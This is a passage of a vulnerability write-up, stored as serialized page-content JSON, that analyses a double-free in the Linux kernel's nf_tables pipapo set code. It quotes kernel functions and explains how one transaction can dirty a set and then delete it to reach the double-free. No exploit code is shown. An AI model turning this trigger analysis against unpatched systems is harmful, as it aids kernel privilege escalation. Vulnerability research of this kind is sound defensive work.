",{"type":27,"tag":207,"props":59240,"children":59241},{"style":226},[59242],{"type":33,"value":9286},{"type":27,"tag":207,"props":59244,"children":59245},{"style":220},[59246],{"type":33,"value":59247},"net",{"type":27,"tag":207,"props":59249,"children":59250},{"style":238},[59251],{"type":33,"value":1123},{"type":27,"tag":207,"props":59253,"children":59254},{"style":214},[59255],{"type":33,"value":16931},{"type":27,"tag":207,"props":59257,"children":59258},{"style":214},[59259],{"type":33,"value":28423},{"type":27,"tag":207,"props":59261,"children":59262},{"style":238},[59263],{"type":33,"value":58338},{"type":27,"tag":207,"props":59265,"children":59266},{"style":226},[59267],{"type":33,"value":9286},{"type":27,"tag":207,"props":59269,"children":59270},{"style":220},[59271],{"type":33,"value":58258},{"type":27,"tag":207,"props":59273,"children":59274},{"style":238},[59275],{"type":33,"value":1842},{"type":27,"tag":207,"props":59277,"children":59278},{"class":209,"line":244},[59279,59283,59287,59292,59296,59301],{"type":27,"tag":207,"props":59280,"children":59281},{"style":214},[59282],{"type":33,"value":40159},{"type":27,"tag":207,"props":59284,"children":59285},{"style":214},[59286],{"type":33,"value":28423},{"type":27,"tag":207,"props":59288,"children":59289},{"style":238},[59290],{"type":33,"value":59291}," nft_set_elem ",{"type":27,"tag":207,"props":59293,"children":59294},{"style":226},[59295],{"type":33,"value":9286},{"type":27,"tag":207,"props":59297,"children":59298},{"style":220},[59299],{"type":33,"value":59300},"elem",{"type":27,"tag":207,"props":59302,"children":59303},{"style":238},[59304],{"type":33,"value":1842},{"type":27,"tag":207,"props":59306,"children":59307},{"class":209,"line":270},[59308,59313,59317,59322,59326],{"type":27,"tag":207,"props":59309,"children":59310},{"style":214},[59311],{"type":33,"value":59312}," struct",{"type":27,"tag":207,"props":59314,"children":59315},{"style":238},[59316],{"type":33,"value":58940},{"type":27,"tag":207,"props":59318,"children":59319},{"style":226},[59320],{"type":33,"value":59321},"**",{"type":27,"tag":207,"props":59323,"children":59324},{"style":220},[59325],{"type":33,"value":58949},{"type":27,"tag":207,"props":59327,"children":59328},{"style":238},[59329],{"type":33,"value":10449},{"type":27,"tag":207,"props":59331,"children":59332},{"class":209,"line":296},[59333],{"type":27,"tag":207,"props":59334,"children":59335},{"style":238},[59336],{"type":33,"value":18158},{"type":27,"tag":207,"props":59338,"children":59339},{"class":209,"line":445},[59340],{"type":27,"tag":207,"props":59341,"children":59342},{"style":238},[59343],{"type":33,"value":17595},{"type":27,"tag":207,"props":59345,"children":59346},{"class":209,"line":867},[59347,59352,59356,59361,59365,59369],{"type":27,"tag":207,"props":59348,"children":59349},{"style":220},[59350],{"type":33,"value":59351}," priv",{"type":27,"tag":207,"props":59353,"children":59354},{"style":238},[59355],{"type":33,"value":8968},{"type":27,"tag":207,"props":59357,"children":59358},{"style":220},[59359],{"type":33,"value":59360},"dirty",{"type":27,"tag":207,"props":59362,"children":59363},{"style":226},[59364],{"type":33,"value":229},{"type":27,"tag":207,"props":59366,"children":59367},{"style":214},[59368],{"type":33,"value":19746},{"type":27,"tag":207,"props":59370,"children":59371},{"style":238},[59372],{"type":33,"value":241},{"type":27,"tag":207,"props":59374,"children":59375},{"class":209,"line":892},[59376],{"type":27,"tag":207,"props":59377,"children":59378},{"style":238},[59379],{"type":33,"value":17595},{"type":27,"tag":207,"props":59381,"children":59382},{"class":209,"line":1475},[59383],{"type":27,"tag":207,"props":59384,"children":59385},{"style":238},[59386],{"type":33,"value":451},{"type":27,"tag":36,"props":59388,"children":59389},{},[59390],{"type":33,"value":59391},"We also see that when the changes are commited, this flag is then unset.",{"type":27,"tag":101,"props":59393,"children":59395},{"className":23789,"code":59394,"language":10435,"meta":7,"style":7},"static void nft_pipapo_commit(struct nft_set *set)\n{\n[...]\n if (!priv->dirty)\n return;\n[...]\n priv->dirty = false;\n[...]\n}\n",[59396],{"type":27,"tag":84,"props":59397,"children":59398},{"__ignoreMap":7},[59399,59439,59446,59453,59484,59495,59502,59529,59536],{"type":27,"tag":207,"props":59400,"children":59401},{"class":209,"line":210},[59402,59406,59410,59415,59419,59423,59427,59431,59435],{"type":27,"tag":207,"props":59403,"children":59404},{"style":214},[59405],{"type":33,"value":58283},{"type":27,"tag":207,"props":59407,"children":59408},{"style":214},[59409],{"type":33,"value":58288},{"type":27,"tag":207,"props":59411,"children":59412},{"style":1335},[59413],{"type":33,"value":59414}," nft_pipapo_commit",{"type":27,"tag":207,"props":59416,"children":59417},{"style":238},[59418],{"type":33,"value":1343},{"type":27,"tag":207,"props":59420,"children":59421},{"style":214},[59422],{"type":33,"value":16677},{"type":27,"tag":207,"props":59424,"children":59425},{"style":238},[59426],{"type":33,"value":58338},{"type":27,"tag":207,"props":59428,"children":59429},{"style":226},[59430],{"type":33,"value":9286},{"type":27,"tag":207,"props":59432,"children":59433},{"style":220},[59434],{"type":33,"value":58258},{"type":27,"tag":207,"props":59436,"children":59437},{"style":238},[59438],{"type":33,"value":10449},{"type":27,"tag":207,"props":59440,"children":59441},{"class":209,"line":244},[59442],{"type":27,"tag":207,"props":59443,"children":59444},{"style":238},[59445],{"type":33,"value":18158},{"type":27,"tag":207,"props":59447,"children":59448},{"class":209,"line":270},[59449],{"type":27,"tag":207,"props":59450,"children":59451},{"style":238},[59452],{"type":33,"value":17595},{"type":27,"tag":207,"props":59454,"children":59455},{"class":209,"line":296},[59456,59460,59464,59468,59472,59476,59480],{"type":27,"tag":207,"props":59457,"children":59458},{"style":376},[59459],{"type":33,"value":23063},{"type":27,"tag":207,"props":59461,"children":59462},{"style":238},[59463],{"type":33,"value":686},{"type":27,"tag":207,"props":59465,"children":59466},{"style":226},[59467],{"type":33,"value":27893},{"type":27,"tag":207,"props":59469,"children":59470},{"style":220},[59471],{"type":33,"value":58811},{"type":27,"tag":207,"props":59473,"children":59474},{"style":238},[59475],{"type":33,"value":8968},{"type":27,"tag":207,"props":59477,"children":59478},{"style":220},[59479],{"type":33,"value":59360},{"type":27,"tag":207,"props":59481,"children":59482},{"style":238},[59483],{"type":33,"value":10449},{"type":27,"tag":207,"props":59485,"children":59486},{"class":209,"line":445},[59487,59491],{"type":27,"tag":207,"props":59488,"children":59489},{"style":376},[59490],{"type":33,"value":46444},{"type":27,"tag":207,"props":59492,"children":59493},{"style":238},[59494],{"type":33,"value":241},{"type":27,"tag":207,"props":59496,"children":59497},{"class":209,"line":867},[59498],{"type":27,"tag":207,"props":59499,"children":59500},{"style":238},[59501],{"type":33,"value":17595},{"type":27,"tag":207,"props":59503,"children":59504},{"class":209,"line":892},[59505,59509,59513,59517,59521,59525],{"type":27,"tag":207,"props":59506,"children":59507},{"style":220},[59508],{"type":33,"value":59351},{"type":27,"tag":207,"props":59510,"children":59511},{"style":238},[59512],{"type":33,"value":8968},{"type":27,"tag":207,"props":59514,"children":59515},{"style":220},[59516],{"type":33,"value":59360},{"type":27,"tag":207,"props":59518,"children":59519},{"style":226},[59520],{"type":33,"value":229},{"type":27,"tag":207,"props":59522,"children":59523},{"style":214},[59524],{"type":33,"value":16337},{"type":27,"tag":207,"props":59526,"children":59527},{"style":238},[59528],{"type":33,"value":241},{"type":27,"tag":207,"props":59530,"children":59531},{"class":209,"line":1475},[59532],{"type":27,"tag":207,"props":59533,"children":59534},{"style":238},[59535],{"type":33,"value":17595},{"type":27,"tag":207,"props":59537,"children":59538},{"class":209,"line":2065},[59539],{"type":27,"tag":207,"props":59540,"children":59541},{"style":238},[59542],{"type":33,"value":451},{"type":27,"tag":36,"props":59544,"children":59545},{},[59546,59548,59553,59555,59560,59562,59567,59569,59574,59576,59582,59584,59590,59592,59597],{"type":33,"value":59547},"We can conclude that as long as we can, in the same transaction, insert a ",{"type":27,"tag":84,"props":59549,"children":59551},{"className":59550},[],[59552],{"type":33,"value":58250},{"type":33,"value":59554}," in the ",{"type":27,"tag":84,"props":59556,"children":59558},{"className":59557},[],[59559],{"type":33,"value":58258},{"type":33,"value":59561}," to make it dirty and then delete the ",{"type":27,"tag":84,"props":59563,"children":59565},{"className":59564},[],[59566],{"type":33,"value":58258},{"type":33,"value":59568},", we will be able to trigger the double-free. But there is another condition: in the commit path, if a ",{"type":27,"tag":84,"props":59570,"children":59572},{"className":59571},[],[59573],{"type":33,"value":58258},{"type":33,"value":59575},"'s ",{"type":27,"tag":84,"props":59577,"children":59579},{"className":59578},[],[59580],{"type":33,"value":59581},"->commit()",{"type":33,"value":59583}," method is executed before its ",{"type":27,"tag":84,"props":59585,"children":59587},{"className":59586},[],[59588],{"type":33,"value":59589},"->destroy()",{"type":33,"value":59591}," method, then the ",{"type":27,"tag":84,"props":59593,"children":59595},{"className":59594},[],[59596],{"type":33,"value":59360},{"type":33,"value":59598}," flag will be unset, and we won't be able to trigger the double-free.",{"type":27,"tag":36,"props":59600,"children":59601},{},[59602],{"type":33,"value":59603},"Let's once again refer to the code and see how these methods are called.",{"type":27,"tag":101,"props":59605,"children":59607},{"className":23789,"code":59606,"language":10435,"meta":7,"style":7},"static int nf_tables_commit(struct net *net, struct sk_buff *skb)\n{\n[...]\n case NFT_MSG_DELSET:\n case NFT_MSG_DESTROYSET: // [1]\n nft_trans_set(trans)->dead = 1; // [2]\n list_del_rcu(&nft_trans_set(trans)->list);\n nf_tables_set_notify(&trans->ctx, nft_trans_set(trans),\n trans->msg_type, GFP_KERNEL);\n break;\n case NFT_MSG_NEWSETELEM: // [3]\n[...]\n if (te->set->ops->commit &&\n list_empty(&te->set->pending_update)) {\n list_add_tail(&te->set->pending_update,\n &set_update_list);\n }\n[...]\n }\n\n nft_set_commit_update(&set_update_list);\n[...]\n nf_tables_commit_release(net);\n\n return 0;\n}\n",[59608],{"type":27,"tag":84,"props":59609,"children":59610},{"__ignoreMap":7},[59611,59673,59680,59687,59695,59708,59743,59777,59819,59841,59853,59866,59873,59921,59962,60002,60015,60022,60029,60036,60043,60068,60075,60088,60095,60111],{"type":27,"tag":207,"props":59612,"children":59613},{"class":209,"line":210},[59614,59618,59622,59627,59631,59635,59639,59643,59647,59651,59655,59660,59664,59669],{"type":27,"tag":207,"props":59615,"children":59616},{"style":214},[59617],{"type":33,"value":58283},{"type":27,"tag":207,"props":59619,"children":59620},{"style":214},[59621],{"type":33,"value":58412},{"type":27,"tag":207,"props":59623,"children":59624},{"style":1335},[59625],{"type":33,"value":59626}," nf_tables_commit",{"type":27,"tag":207,"props":59628,"children":59629},{"style":238},[59630],{"type":33,"value":1343},{"type":27,"tag":207,"props":59632,"children":59633},{"style":214},[59634],{"type":33,"value":16677},{"type":27,"tag":207,"props":59636,"children":59637},{"style":238},[59638],{"type":33,"value":59238},{"type":27,"tag":207,"props":59640,"children":59641},{"style":226},[59642],{"type":33,"value":9286},{"type":27,"tag":207,"props":59644,"children":59645},{"style":220},[59646],{"type":33,"value":59247},{"type":27,"tag":207,"props":59648,"children":59649},{"style":238},[59650],{"type":33,"value":1123},{"type":27,"tag":207,"props":59652,"children":59653},{"style":214},[59654],{"type":33,"value":16677},{"type":27,"tag":207,"props":59656,"children":59657},{"style":238},[59658],{"type":33,"value":59659}," sk_buff ",{"type":27,"tag":207,"props":59661,"children":59662},{"style":226},[59663],{"type":33,"value":9286},{"type":27,"tag":207,"props":59665,"children":59666},{"style":220},[59667],{"type":33,"value":59668},"skb",{"type":27,"tag":207,"props":59670,"children":59671},{"style":238},[59672],{"type":33,"value":10449},{"type":27,"tag":207,"props":59674,"children":59675},{"class":209,"line":244},[59676],{"type":27,"tag":207,"props":59677,"children":59678},{"style":238},[59679],{"type":33,"value":18158},{"type":27,"tag":207,"props":59681,"children":59682},{"class":209,"line":270},[59683],{"type":27,"tag":207,"props":59684,"children":59685},{"style":238},[59686],{"type":33,"value":17595},{"type":27,"tag":207,"props":59688,"children":59689},{"class":209,"line":296},[59690],{"type":27,"tag":207,"props":59691,"children":59692},{"style":238},[59693],{"type":33,"value":59694}," case NFT_MSG_DELSET:\n",{"type":27,"tag":207,"props":59696,"children":59697},{"class":209,"line":445},[59698,59703],{"type":27,"tag":207,"props":59699,"children":59700},{"style":238},[59701],{"type":33,"value":59702}," case NFT_MSG_DESTROYSET:",{"type":27,"tag":207,"props":59704,"children":59705},{"style":4647},[59706],{"type":33,"value":59707}," // [1]\n",{"type":27,"tag":207,"props":59709,"children":59710},{"class":209,"line":867},[59711,59716,59721,59726,59730,59734,59738],{"type":27,"tag":207,"props":59712,"children":59713},{"style":1335},[59714],{"type":33,"value":59715}," nft_trans_set",{"type":27,"tag":207,"props":59717,"children":59718},{"style":238},[59719],{"type":33,"value":59720},"(trans)->",{"type":27,"tag":207,"props":59722,"children":59723},{"style":220},[59724],{"type":33,"value":59725},"dead",{"type":27,"tag":207,"props":59727,"children":59728},{"style":226},[59729],{"type":33,"value":229},{"type":27,"tag":207,"props":59731,"children":59732},{"style":232},[59733],{"type":33,"value":235},{"type":27,"tag":207,"props":59735,"children":59736},{"style":238},[59737],{"type":33,"value":56312},{"type":27,"tag":207,"props":59739,"children":59740},{"style":4647},[59741],{"type":33,"value":59742}," // [2]\n",{"type":27,"tag":207,"props":59744,"children":59745},{"class":209,"line":892},[59746,59751,59755,59759,59764,59768,59773],{"type":27,"tag":207,"props":59747,"children":59748},{"style":1335},[59749],{"type":33,"value":59750}," list_del_rcu",{"type":27,"tag":207,"props":59752,"children":59753},{"style":238},[59754],{"type":33,"value":1343},{"type":27,"tag":207,"props":59756,"children":59757},{"style":226},[59758],{"type":33,"value":10398},{"type":27,"tag":207,"props":59760,"children":59761},{"style":1335},[59762],{"type":33,"value":59763},"nft_trans_set",{"type":27,"tag":207,"props":59765,"children":59766},{"style":238},[59767],{"type":33,"value":59720},{"type":27,"tag":207,"props":59769,"children":59770},{"style":220},[59771],{"type":33,"value":59772},"list",{"type":27,"tag":207,"props":59774,"children":59775},{"style":238},[59776],{"type":33,"value":1455},{"type":27,"tag":207,"props":59778,"children":59779},{"class":209,"line":1475},[59780,59785,59789,59793,59798,59802,59806,59810,59814],{"type":27,"tag":207,"props":59781,"children":59782},{"style":1335},[59783],{"type":33,"value":59784}," nf_tables_set_notify",{"type":27,"tag":207,"props":59786,"children":59787},{"style":238},[59788],{"type":33,"value":1343},{"type":27,"tag":207,"props":59790,"children":59791},{"style":226},[59792],{"type":33,"value":10398},{"type":27,"tag":207,"props":59794,"children":59795},{"style":220},[59796],{"type":33,"value":59797},"trans",{"type":27,"tag":207,"props":59799,"children":59800},{"style":238},[59801],{"type":33,"value":8968},{"type":27,"tag":207,"props":59803,"children":59804},{"style":220},[59805],{"type":33,"value":27552},{"type":27,"tag":207,"props":59807,"children":59808},{"style":238},[59809],{"type":33,"value":1123},{"type":27,"tag":207,"props":59811,"children":59812},{"style":1335},[59813],{"type":33,"value":59763},{"type":27,"tag":207,"props":59815,"children":59816},{"style":238},[59817],{"type":33,"value":59818},"(trans),\n",{"type":27,"tag":207,"props":59820,"children":59821},{"class":209,"line":2065},[59822,59827,59831,59836],{"type":27,"tag":207,"props":59823,"children":59824},{"style":220},[59825],{"type":33,"value":59826}," trans",{"type":27,"tag":207,"props":59828,"children":59829},{"style":238},[59830],{"type":33,"value":8968},{"type":27,"tag":207,"props":59832,"children":59833},{"style":220},[59834],{"type":33,"value":59835},"msg_type",{"type":27,"tag":207,"props":59837,"children":59838},{"style":238},[59839],{"type":33,"value":59840},", GFP_KERNEL);\n",{"type":27,"tag":207,"props":59842,"children":59843},{"class":209,"line":2092},[59844,59849],{"type":27,"tag":207,"props":59845,"children":59846},{"style":376},[59847],{"type":33,"value":59848}," break",{"type":27,"tag":207,"props":59850,"children":59851},{"style":238},[59852],{"type":33,"value":241},{"type":27,"tag":207,"props":59854,"children":59855},{"class":209,"line":2130},[59856,59861],{"type":27,"tag":207,"props":59857,"children":59858},{"style":238},[59859],{"type":33,"value":59860}," case NFT_MSG_NEWSETELEM:",{"type":27,"tag":207,"props":59862,"children":59863},{"style":4647},[59864],{"type":33,"value":59865}," // [3]\n",{"type":27,"tag":207,"props":59867,"children":59868},{"class":209,"line":2168},[59869],{"type":27,"tag":207,"props":59870,"children":59871},{"style":238},[59872],{"type":33,"value":17595},{"type":27,"tag":207,"props":59874,"children":59875},{"class":209,"line":4095},[59876,59881,59885,59890,59894,59898,59902,59907,59911,59916],{"type":27,"tag":207,"props":59877,"children":59878},{"style":376},[59879],{"type":33,"value":59880}," if",{"type":27,"tag":207,"props":59882,"children":59883},{"style":238},[59884],{"type":33,"value":686},{"type":27,"tag":207,"props":59886,"children":59887},{"style":220},[59888],{"type":33,"value":59889},"te",{"type":27,"tag":207,"props":59891,"children":59892},{"style":238},[59893],{"type":33,"value":8968},{"type":27,"tag":207,"props":59895,"children":59896},{"style":220},[59897],{"type":33,"value":58258},{"type":27,"tag":207,"props":59899,"children":59900},{"style":238},[59901],{"type":33,"value":8968},{"type":27,"tag":207,"props":59903,"children":59904},{"style":220},[59905],{"type":33,"value":59906},"ops",{"type":27,"tag":207,"props":59908,"children":59909},{"style":238},[59910],{"type":33,"value":8968},{"type":27,"tag":207,"props":59912,"children":59913},{"style":220},[59914],{"type":33,"value":59915},"commit",{"type":27,"tag":207,"props":59917,"children":59918},{"style":226},[59919],{"type":33,"value":59920}," &&\n",{"type":27,"tag":207,"props":59922,"children":59923},{"class":209,"line":4103},[59924,59929,59933,59937,59941,59945,59949,59953,59958],{"type":27,"tag":207,"props":59925,"children":59926},{"style":1335},[59927],{"type":33,"value":59928}," list_empty",{"type":27,"tag":207,"props":59930,"children":59931},{"style":238},[59932],{"type":33,"value":1343},{"type":27,"tag":207,"props":59934,"children":59935},{"style":226},[59936],{"type":33,"value":10398},{"type":27,"tag":207,"props":59938,"children":59939},{"style":220},[59940],{"type":33,"value":59889},{"type":27,"tag":207,"props":59942,"children":59943},{"style":238},[59944],{"type":33,"value":8968},{"type":27,"tag":207,"props":59946,"children":59947},{"style":220},[59948],{"type":33,"value":58258},{"type":27,"tag":207,"props":59950,"children":59951},{"style":238},[59952],{"type":33,"value":8968},{"type":27,"tag":207,"props":59954,"children":59955},{"style":220},[59956],{"type":33,"value":59957},"pending_update",{"type":27,"tag":207,"props":59959,"children":59960},{"style":238},[59961],{"type":33,"value":8955},{"type":27,"tag":207,"props":59963,"children":59964},{"class":209,"line":4154},[59965,59970,59974,59978,59982,59986,59990,59994,59998],{"type":27,"tag":207,"props":59966,"children":59967},{"style":1335},[59968],{"type":33,"value":59969}," list_add_tail",{"type":27,"tag":207,"props":59971,"children":59972},{"style":238},[59973],{"type":33,"value":1343},{"type":27,"tag":207,"props":59975,"children":59976},{"style":226},[59977],{"type":33,"value":10398},{"type":27,"tag":207,"props":59979,"children":59980},{"style":220},[59981],{"type":33,"value":59889},{"type":27,"tag":207,"props":59983,"children":59984},{"style":238},[59985],{"type":33,"value":8968},{"type":27,"tag":207,"props":59987,"children":59988},{"style":220},[59989],{"type":33,"value":58258},{"type":27,"tag":207,"props":59991,"children":59992},{"style":238},[59993],{"type":33,"value":8968},{"type":27,"tag":207,"props":59995,"children":59996},{"style":220},[59997],{"type":33,"value":59957},{"type":27,"tag":207,"props":59999,"children":60000},{"style":238},[60001],{"type":33,"value":1842},{"type":27,"tag":207,"props":60003,"children":60004},{"class":209,"line":4203},[60005,60010],{"type":27,"tag":207,"props":60006,"children":60007},{"style":226},[60008],{"type":33,"value":60009}," &",{"type":27,"tag":207,"props":60011,"children":60012},{"style":238},[60013],{"type":33,"value":60014},"set_update_list);\n",{"type":27,"tag":207,"props":60016,"children":60017},{"class":209,"line":4249},[60018],{"type":27,"tag":207,"props":60019,"children":60020},{"style":238},[60021],{"type":33,"value":42004},{"type":27,"tag":207,"props":60023,"children":60024},{"class":209,"line":4290},[60025],{"type":27,"tag":207,"props":60026,"children":60027},{"style":238},[60028],{"type":33,"value":17595},{"type":27,"tag":207,"props":60030,"children":60031},{"class":209,"line":4304},[60032],{"type":27,"tag":207,"props":60033,"children":60034},{"style":238},[60035],{"type":33,"value":16872},{"type":27,"tag":207,"props":60037,"children":60038},{"class":209,"line":5466},[60039],{"type":27,"tag":207,"props":60040,"children":60041},{"emptyLinePlaceholder":19},[60042],{"type":33,"value":2062},{"type":27,"tag":207,"props":60044,"children":60045},{"class":209,"line":5530},[60046,60051,60055,60059,60064],{"type":27,"tag":207,"props":60047,"children":60048},{"style":1335},[60049],{"type":33,"value":60050}," nft_set_commit_update",{"type":27,"tag":207,"props":60052,"children":60053},{"style":238},[60054],{"type":33,"value":1343},{"type":27,"tag":207,"props":60056,"children":60057},{"style":226},[60058],{"type":33,"value":10398},{"type":27,"tag":207,"props":60060,"children":60061},{"style":220},[60062],{"type":33,"value":60063},"set_update_list",{"type":27,"tag":207,"props":60065,"children":60066},{"style":238},[60067],{"type":33,"value":1455},{"type":27,"tag":207,"props":60069,"children":60070},{"class":209,"line":7900},[60071],{"type":27,"tag":207,"props":60072,"children":60073},{"style":238},[60074],{"type":33,"value":17595},{"type":27,"tag":207,"props":60076,"children":60077},{"class":209,"line":7909},[60078,60083],{"type":27,"tag":207,"props":60079,"children":60080},{"style":1335},[60081],{"type":33,"value":60082}," nf_tables_commit_release",{"type":27,"tag":207,"props":60084,"children":60085},{"style":238},[60086],{"type":33,"value":60087},"(net);\n",{"type":27,"tag":207,"props":60089,"children":60090},{"class":209,"line":7917},[60091],{"type":27,"tag":207,"props":60092,"children":60093},{"emptyLinePlaceholder":19},[60094],{"type":33,"value":2062},{"type":27,"tag":207,"props":60096,"children":60097},{"class":209,"line":7926},[60098,60103,60107],{"type":27,"tag":207,"props":60099,"children":60100},{"style":376},[60101],{"type":33,"value":60102}," return",{"type":27,"tag":207,"props":60104,"children":60105},{"style":232},[60106],{"type":33,"value":4680},{"type":27,"tag":207,"props":60108,"children":60109},{"style":238},[60110],{"type":33,"value":241},{"type":27,"tag":207,"props":60112,"children":60113},{"class":209,"line":7934},[60114],{"type":27,"tag":207,"props":60115,"children":60116},{"style":238},[60117],{"type":33,"value":451},{"type":27,"tag":36,"props":60119,"children":60120},{},[60121,60122,60128,60130,60135],{"type":33,"value":23888},{"type":27,"tag":84,"props":60123,"children":60125},{"className":60124},[],[60126],{"type":33,"value":60127},"nft_set_commit_update()",{"type":33,"value":60129}," function in the code above will call the ",{"type":27,"tag":84,"props":60131,"children":60133},{"className":60132},[],[60134],{"type":33,"value":59581},{"type":33,"value":60136}," method for any objects that were marked as pending an update.",{"type":27,"tag":101,"props":60138,"children":60140},{"className":23789,"code":60139,"language":10435,"meta":7,"style":7},"static void nft_set_commit_update(struct list_head *set_update_list)\n{\n struct nft_set *set, *next;\n\n list_for_each_entry_safe(set, next, set_update_list, pending_update) {\n list_del_init(&set->pending_update);\n\n if (!set->ops->commit || set->dead) // [4]\n continue;\n\n set->ops->commit(set); // [5]\n }\n}\n",[60141],{"type":27,"tag":84,"props":60142,"children":60143},{"__ignoreMap":7},[60144,60184,60191,60220,60227,60240,60272,60279,60340,60351,60358,60392,60399],{"type":27,"tag":207,"props":60145,"children":60146},{"class":209,"line":210},[60147,60151,60155,60159,60163,60167,60172,60176,60180],{"type":27,"tag":207,"props":60148,"children":60149},{"style":214},[60150],{"type":33,"value":58283},{"type":27,"tag":207,"props":60152,"children":60153},{"style":214},[60154],{"type":33,"value":58288},{"type":27,"tag":207,"props":60156,"children":60157},{"style":1335},[60158],{"type":33,"value":60050},{"type":27,"tag":207,"props":60160,"children":60161},{"style":238},[60162],{"type":33,"value":1343},{"type":27,"tag":207,"props":60164,"children":60165},{"style":214},[60166],{"type":33,"value":16677},{"type":27,"tag":207,"props":60168,"children":60169},{"style":238},[60170],{"type":33,"value":60171}," list_head ",{"type":27,"tag":207,"props":60173,"children":60174},{"style":226},[60175],{"type":33,"value":9286},{"type":27,"tag":207,"props":60177,"children":60178},{"style":220},[60179],{"type":33,"value":60063},{"type":27,"tag":207,"props":60181,"children":60182},{"style":238},[60183],{"type":33,"value":10449},{"type":27,"tag":207,"props":60185,"children":60186},{"class":209,"line":244},[60187],{"type":27,"tag":207,"props":60188,"children":60189},{"style":238},[60190],{"type":33,"value":18158},{"type":27,"tag":207,"props":60192,"children":60193},{"class":209,"line":270},[60194,60198,60202,60206,60211,60215],{"type":27,"tag":207,"props":60195,"children":60196},{"style":214},[60197],{"type":33,"value":28423},{"type":27,"tag":207,"props":60199,"children":60200},{"style":238},[60201],{"type":33,"value":58338},{"type":27,"tag":207,"props":60203,"children":60204},{"style":226},[60205],{"type":33,"value":9286},{"type":27,"tag":207,"props":60207,"children":60208},{"style":238},[60209],{"type":33,"value":60210},"set, ",{"type":27,"tag":207,"props":60212,"children":60213},{"style":226},[60214],{"type":33,"value":9286},{"type":27,"tag":207,"props":60216,"children":60217},{"style":238},[60218],{"type":33,"value":60219},"next;\n",{"type":27,"tag":207,"props":60221,"children":60222},{"class":209,"line":296},[60223],{"type":27,"tag":207,"props":60224,"children":60225},{"emptyLinePlaceholder":19},[60226],{"type":33,"value":2062},{"type":27,"tag":207,"props":60228,"children":60229},{"class":209,"line":445},[60230,60235],{"type":27,"tag":207,"props":60231,"children":60232},{"style":1335},[60233],{"type":33,"value":60234}," list_for_each_entry_safe",{"type":27,"tag":207,"props":60236,"children":60237},{"style":238},[60238],{"type":33,"value":60239},"(set, next, set_update_list, pending_update) {\n",{"type":27,"tag":207,"props":60241,"children":60242},{"class":209,"line":867},[60243,60248,60252,60256,60260,60264,60268],{"type":27,"tag":207,"props":60244,"children":60245},{"style":1335},[60246],{"type":33,"value":60247}," list_del_init",{"type":27,"tag":207,"props":60249,"children":60250},{"style":238},[60251],{"type":33,"value":1343},{"type":27,"tag":207,"props":60253,"children":60254},{"style":226},[60255],{"type":33,"value":10398},{"type":27,"tag":207,"props":60257,"children":60258},{"style":220},[60259],{"type":33,"value":58258},{"type":27,"tag":207,"props":60261,"children":60262},{"style":238},[60263],{"type":33,"value":8968},{"type":27,"tag":207,"props":60265,"children":60266},{"style":220},[60267],{"type":33,"value":59957},{"type":27,"tag":207,"props":60269,"children":60270},{"style":238},[60271],{"type":33,"value":1455},{"type":27,"tag":207,"props":60273,"children":60274},{"class":209,"line":892},[60275],{"type":27,"tag":207,"props":60276,"children":60277},{"emptyLinePlaceholder":19},[60278],{"type":33,"value":2062},{"type":27,"tag":207,"props":60280,"children":60281},{"class":209,"line":1475},[60282,60286,60290,60294,60298,60302,60306,60310,60314,60318,60323,60327,60331,60335],{"type":27,"tag":207,"props":60283,"children":60284},{"style":376},[60285],{"type":33,"value":38654},{"type":27,"tag":207,"props":60287,"children":60288},{"style":238},[60289],{"type":33,"value":686},{"type":27,"tag":207,"props":60291,"children":60292},{"style":226},[60293],{"type":33,"value":27893},{"type":27,"tag":207,"props":60295,"children":60296},{"style":220},[60297],{"type":33,"value":58258},{"type":27,"tag":207,"props":60299,"children":60300},{"style":238},[60301],{"type":33,"value":8968},{"type":27,"tag":207,"props":60303,"children":60304},{"style":220},[60305],{"type":33,"value":59906},{"type":27,"tag":207,"props":60307,"children":60308},{"style":238},[60309],{"type":33,"value":8968},{"type":27,"tag":207,"props":60311,"children":60312},{"style":220},[60313],{"type":33,"value":59915},{"type":27,"tag":207,"props":60315,"children":60316},{"style":226},[60317],{"type":33,"value":30971},{"type":27,"tag":207,"props":60319,"children":60320},{"style":220},[60321],{"type":33,"value":60322}," set",{"type":27,"tag":207,"props":60324,"children":60325},{"style":238},[60326],{"type":33,"value":8968},{"type":27,"tag":207,"props":60328,"children":60329},{"style":220},[60330],{"type":33,"value":59725},{"type":27,"tag":207,"props":60332,"children":60333},{"style":238},[60334],{"type":33,"value":10416},{"type":27,"tag":207,"props":60336,"children":60337},{"style":4647},[60338],{"type":33,"value":60339}," // [4]\n",{"type":27,"tag":207,"props":60341,"children":60342},{"class":209,"line":2065},[60343,60347],{"type":27,"tag":207,"props":60344,"children":60345},{"style":376},[60346],{"type":33,"value":58727},{"type":27,"tag":207,"props":60348,"children":60349},{"style":238},[60350],{"type":33,"value":241},{"type":27,"tag":207,"props":60352,"children":60353},{"class":209,"line":2092},[60354],{"type":27,"tag":207,"props":60355,"children":60356},{"emptyLinePlaceholder":19},[60357],{"type":33,"value":2062},{"type":27,"tag":207,"props":60359,"children":60360},{"class":209,"line":2130},[60361,60366,60370,60374,60378,60382,60387],{"type":27,"tag":207,"props":60362,"children":60363},{"style":220},[60364],{"type":33,"value":60365}," set",{"type":27,"tag":207,"props":60367,"children":60368},{"style":238},[60369],{"type":33,"value":8968},{"type":27,"tag":207,"props":60371,"children":60372},{"style":220},[60373],{"type":33,"value":59906},{"type":27,"tag":207,"props":60375,"children":60376},{"style":238},[60377],{"type":33,"value":8968},{"type":27,"tag":207,"props":60379,"children":60380},{"style":1335},[60381],{"type":33,"value":59915},{"type":27,"tag":207,"props":60383,"children":60384},{"style":238},[60385],{"type":33,"value":60386},"(set);",{"type":27,"tag":207,"props":60388,"children":60389},{"style":4647},[60390],{"type":33,"value":60391}," // [5]\n",{"type":27,"tag":207,"props":60393,"children":60394},{"class":209,"line":2168},[60395],{"type":27,"tag":207,"props":60396,"children":60397},{"style":238},[60398],{"type":33,"value":16872},{"type":27,"tag":207,"props":60400,"children":60401},{"class":209,"line":4095},[60402],{"type":27,"tag":207,"props":60403,"children":60404},{"style":238},[60405],{"type":33,"value":451},{"type":27,"tag":36,"props":60407,"children":60408},{},[60409,60411,60417,60419,60424,60425,60430],{"type":33,"value":60410},"Later on, the ",{"type":27,"tag":84,"props":60412,"children":60414},{"className":60413},[],[60415],{"type":33,"value":60416},"nf_tables_commit_release()",{"type":33,"value":60418}," function is called to free any objects that were marked for release, and eventually calls the 